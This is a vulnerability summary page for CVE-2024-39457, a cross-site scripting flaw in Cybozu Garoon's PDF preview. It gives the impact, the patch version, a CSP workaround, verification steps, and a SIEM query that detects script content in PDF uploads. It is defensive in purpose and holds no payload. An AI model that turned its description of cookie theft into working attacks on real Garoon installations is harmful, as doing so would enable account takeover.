Login Sign Up

CVE-2024-39457

5.4 MEDIUM
Cross-Site Scripting

📋 TL;DR

This vulnerability allows attackers to inject malicious scripts into PDF previews in Cybozu Garoon. When exploited, these scripts execute in the browsers of logged-in users, potentially stealing session cookies or performing unauthorized actions. Organizations using Garoon versions 6.0.0 to 6.0.1 are affected.

💻 Affected Systems

Products:
  • Cybozu Garoon
Versions: 6.0.0 to 6.0.1
Operating Systems: Any OS running Garoon
Default Config Vulnerable: ⚠️ Yes
Notes: All installations within the affected version range are vulnerable by default.

📦 What is this software?

Garoon by Cybozu

View all CVEs affecting Garoon →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, gain full system access, and compromise sensitive organizational data.

🟠

Likely Case

Attackers steal user session cookies to impersonate legitimate users and access their data/privileges.

🟢

If Mitigated

With proper input validation and output encoding, script execution is prevented, limiting impact to data display issues.

🌐 Internet-Facing: MEDIUM - Exploitation requires user interaction with malicious PDF, but internet exposure increases attack surface.
🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could exploit this to escalate privileges.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user to view a malicious PDF, but XSS payloads are well-documented and easy to craft.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.0.2

Vendor Advisory: https://kb.cybozu.support/?product=garoon&v=&fv=6.0.2&t=%E8%84%86%E5%BC%B1%E6%80%A7&f=&r=&b=&s=&posts_per_page=20

Restart Required: Yes

Instructions:

1. Backup your Garoon installation. 2. Download Garoon 6.0.2 from Cybozu support. 3. Follow the official upgrade guide. 4. Restart the Garoon service. 5. Verify the version is updated.

🔧 Temporary Workarounds

Disable PDF preview functionality

all

Temporarily disable PDF preview features in Garoon to prevent exploitation.

Implement Content Security Policy

all

Add CSP headers to restrict script execution from untrusted sources.

Add 'Content-Security-Policy: default-src 'self'; script-src 'self'' to web server configuration

🧯 If You Can't Patch

  • Implement web application firewall rules to block XSS payloads in PDF uploads
  • Restrict PDF uploads to trusted users only and implement file type validation

🔍 How to Verify

Check if Vulnerable:

Check Garoon version in administration panel. If version is 6.0.0 or 6.0.1, system is vulnerable.

Check Version:

Check 'System Information' in Garoon administration interface

Verify Fix Applied:

After patching, verify version shows 6.0.2 or higher in administration panel.

📡 Detection & Monitoring

Log Indicators:

  • Unusual PDF uploads with script-like content
  • Multiple failed PDF preview attempts

Network Indicators:

  • HTTP requests containing XSS payloads in PDF parameters

SIEM Query:

source="garoon_logs" AND (message="PDF preview" OR message="PDF upload") AND (message CONTAINS "script" OR message CONTAINS "javascript")

📊 Metadata

CVE ID: CVE-2024-39457
CVSS v3 Score: 5.4 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Published: July 19, 2024
Last Updated: March 19, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-39457, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)